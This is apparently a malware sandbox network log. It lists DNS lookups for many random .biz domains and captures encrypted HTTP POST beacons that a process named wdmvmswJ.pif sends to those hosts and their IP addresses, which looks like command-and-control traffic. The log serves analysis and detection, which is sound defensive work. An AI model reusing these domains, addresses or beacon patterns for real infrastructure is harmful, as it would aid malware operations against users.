                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.760453939 CET1.1.1.1192.168.2.80xd7aaNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.912180901 CET1.1.1.1192.168.2.80x95f8No error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.180849075 CET1.1.1.1192.168.2.80xe7e5No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.429605007 CET1.1.1.1192.168.2.80x51c9No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.060884953 CET1.1.1.1192.168.2.80xf758No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.928776979 CET1.1.1.1192.168.2.80x82e9No error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.124875069 CET1.1.1.1192.168.2.80xae98No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.784631014 CET1.1.1.1192.168.2.80x5a19No error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.843357086 CET1.1.1.1192.168.2.80x9249No error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.825274944 CET1.1.1.1192.168.2.80x4641No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.897753000 CET1.1.1.1192.168.2.80xfcc3No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.946619034 CET1.1.1.1192.168.2.80xa1a7No error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.332935095 CET1.1.1.1192.168.2.80x2748No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.370387077 CET1.1.1.1192.168.2.80x8aeaNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.484617949 CET1.1.1.1192.168.2.80x324No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.991656065 CET1.1.1.1192.168.2.80x2c72No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.439444065 CET1.1.1.1192.168.2.80xf134No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.439444065 CET1.1.1.1192.168.2.80xf134No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.812618017 CET1.1.1.1192.168.2.80x46daNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.821398020 CET1.1.1.1192.168.2.80x7288No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.515240908 CET1.1.1.1192.168.2.80x4c03No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.704456091 CET1.1.1.1192.168.2.80xd654No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253243923 CET1.1.1.1192.168.2.80xebffNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253258944 CET1.1.1.1192.168.2.80xebffNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.021461964 CET1.1.1.1192.168.2.80x8a43No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.222269058 CET1.1.1.1192.168.2.80x9d1cNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.089057922 CET1.1.1.1192.168.2.80xa9No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.769203901 CET1.1.1.1192.168.2.80x45fNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.769203901 CET1.1.1.1192.168.2.80x45fNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.674583912 CET1.1.1.1192.168.2.80x2acNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.706001043 CET1.1.1.1192.168.2.80x4e16No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.536720037 CET1.1.1.1192.168.2.80xd6d5No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.192956924 CET1.1.1.1192.168.2.80x3361No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450458050 CET1.1.1.1192.168.2.80x3c7eNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450473070 CET1.1.1.1192.168.2.80x3c7eNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.297688007 CET1.1.1.1192.168.2.80x701eNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.641279936 CET1.1.1.1192.168.2.80x56b2No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.146872997 CET1.1.1.1192.168.2.80xf80No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.898390055 CET1.1.1.1192.168.2.80xe1e8No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.587099075 CET1.1.1.1192.168.2.80x944bNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.272310019 CET1.1.1.1192.168.2.80x2075No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.358274937 CET1.1.1.1192.168.2.80x7e11No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.358274937 CET1.1.1.1192.168.2.80x7e11No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.953687906 CET1.1.1.1192.168.2.80x7469No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.723918915 CET1.1.1.1192.168.2.80xddd8No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.419398069 CET1.1.1.1192.168.2.80x5de5No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.218442917 CET1.1.1.1192.168.2.80x4930No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.266259909 CET1.1.1.1192.168.2.80x986eNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.119230986 CET1.1.1.1192.168.2.80xff4dNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.119297028 CET1.1.1.1192.168.2.80xff4dNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.944817066 CET1.1.1.1192.168.2.80xc6a7No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.584604979 CET1.1.1.1192.168.2.80x9ee3No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.740854025 CET1.1.1.1192.168.2.80x8a50No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.054765940 CET1.1.1.1192.168.2.80xbcc9No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.692641973 CET1.1.1.1192.168.2.80xb900No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.917864084 CET1.1.1.1192.168.2.80xa95bNo error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.368314028 CET1.1.1.1192.168.2.80x824bNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.218394995 CET1.1.1.1192.168.2.80x6daaNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.437629938 CET1.1.1.1192.168.2.80xc284No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.097129107 CET1.1.1.1192.168.2.80xb527No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.896572113 CET1.1.1.1192.168.2.80x7c4aNo error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.954758883 CET1.1.1.1192.168.2.80x67bcNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.954758883 CET1.1.1.1192.168.2.80x67bcNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.754592896 CET1.1.1.1192.168.2.80x83ceNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.851629972 CET1.1.1.1192.168.2.80x4902No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.449150085 CET1.1.1.1192.168.2.80x82b1No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.715600014 CET1.1.1.1192.168.2.80x224cNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.288481951 CET1.1.1.1192.168.2.80xdf4aNo error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • giliplg.biz
Session ID: 0
Source IP: 192.168.2.8
Source Port: 49708
Destination IP: 54.244.188.177
Destination Port: 80
PID: 4536
Process: C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp: Nov 1, 2024 08:23:23.084994078 CET
Bytes transferred: 356
Direction: OUT
Data:
POST /xvpanbchxym HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084994078 CET802OUTData Raw: 86 4c 25 c6 52 95 85 38 16 03 00 00 46 44 6f 17 9b 2b 73 9a c3 f5 97 ca bc 1c 11 c8 49 bc 2a e6 2a 07 d6 68 b2 dd 34 f3 db ae 43 7e 39 21 86 bb 9c 49 99 95 b9 a6 47 af 7d f9 e4 5f f2 62 f5 a0 e6 07 2d 4d 3a d6 df 74 91 07 95 7b e9 1a 63 b2 59 2a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: L%R8FDo+sI**h4C~9!IG}_b-M:t{cY*:L2gr:&%c3b+Gl&-AIq*ivfxi?]t$ye-R|ry<h`pwo:sd>}r,d|9?k\mCV.P6
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.911797047 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3705e2d25959b713d271882e99f285a5|173.254.250.82|1730445803|1730445803|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:24.313709974 CET | 345 | OUT | POST /ks HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:23:24.313756943 CET | 802 | OUT | Data Raw: 45 12 0c ad 12 39 2e bf 16 03 00 00 7a ef c4 0e f5 87 c9 9b 6c a6 60 07 d1 21 91 61 a1 44 37 53 dd 7d 6a 0c 07 55 2d c0 16 ef 1d af 3d 64 82 8a 90 b0 16 86 49 d6 f2 86 4f 7f 1d fa eb 48 f2 67 bd 27 9c 83 b4 36 cf 5c ca 17 e3 dc 70 90 40 fc dc e4
    Data Ascii: E9.zl`!aD7S}jU-=dIOHg'6\p@l%L,B{}6sDV)^[DML~n~4Zd:|-3bC;+*)_><[Z; $pEs=iILY
Nov 1, 2024 08:23:25.732438087 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:23:25 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=eca8a85f2a5723dd7cdeb3c0755f29e9|173.254.250.82|1730445805|1730445805|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:25.769313097 CET | 355 | OUT | POST /iwwaryskplxdjo HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:23:25.769336939 CET | 802 | OUT | Data Raw: 7d 8c c5 5c 87 24 20 26 16 03 00 00 21 3a b0 2b 71 4f 0e 03 ca ec 0c d8 20 e7 18 30 d9 4a ee 08 d6 29 d4 3e 1a 08 c9 69 09 28 b5 d8 57 6d 3c 73 0a 71 33 2f a9 8f ab b3 d4 07 67 80 71 9d 6f db 42 0f 39 74 df eb e9 8e 30 70 e9 6a 19 ee 7d e9 d8 d0
    Data Ascii: }\$ &!:+qO 0J)>i(Wm<sq3/gqoB9t0pj}1ZrX6<P>@UEv,A(T`t"AijpuMQC>'m bLao1W9*jCpKE\uTv.nL+3S+cV
Nov 1, 2024 08:23:26.609052896 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:23:26 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=5d603b1984930fa91fc5ef21e8902be6|173.254.250.82|1730445806|1730445806|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:23:26.829791069 CET | 357 | OUT | POST /ludmpidgkyjmk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Nov 1, 2024 08:23:26.829807043 CET | 802 | OUT | Data Raw: a0 73 e5 41 c5 64 31 3c 16 03 00 00 b3 d0 e4 a9 85 d8 db 32 9c f1 80 cb 20 e0 a2 ca 5b 86 d2 98 14 5d ae 17 ff f8 23 16 c9 60 c7 52 3e 70 6b 17 b8 06 e2 ea ca a9 d0 d5 92 43 11 bd a2 e4 69 65 b7 82 fa 5a 88 0d 62 da 33 3d 8b ec a1 bf 3a 24 21 db
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: sAd1<2 []#`R>pkCieZb3=:$!0290hPJJ=$V02}-8q@jWkMl&*.fD^{z>@DoQR6bEbK9JEC$[svgR+SF@zgU=_P_u3O
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.526943922 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8199c0f6484ce44907bc3498dfff43a9|173.254.250.82|1730445808|1730445808|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
4           192.168.2.8  49712        54.244.188.177   80                4916  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:23:27.273194075 CET  346                OUT        POST /i HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:23:27.273282051 CET  778                OUT        Data Raw: be bc 51 97 a6 02 bf ca fe 02 00 00 39 b6 36 80 7f e8 6f eb b1 61 11 1b a4 04 dc 6a bc a6 6d 8b da 9e a7 7e 9f 1e 1b 7e ea ac aa 13 0f ea b4 20 78 8c 5b 55 cd 1b 48 d2 c0 ec 2b 12 0b c9 77 04 96 22 d7 df 17 e9 fc 38 b4 48 84 ea 61 d0 9e e9 ac 3b
Data Ascii: Q96oajm~~ x[UH+w"8Ha;EfJgQK"\V@*k.xIF-.qqD!UO;)A~nDXmI}Z)bZ>?KH_Db54|]
Nov 1, 2024 08:23:28.113450050 CET  417                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:23:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=edcde14c2557f0bc429541d9545c3e3f|173.254.250.82|1730445807|1730445807|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


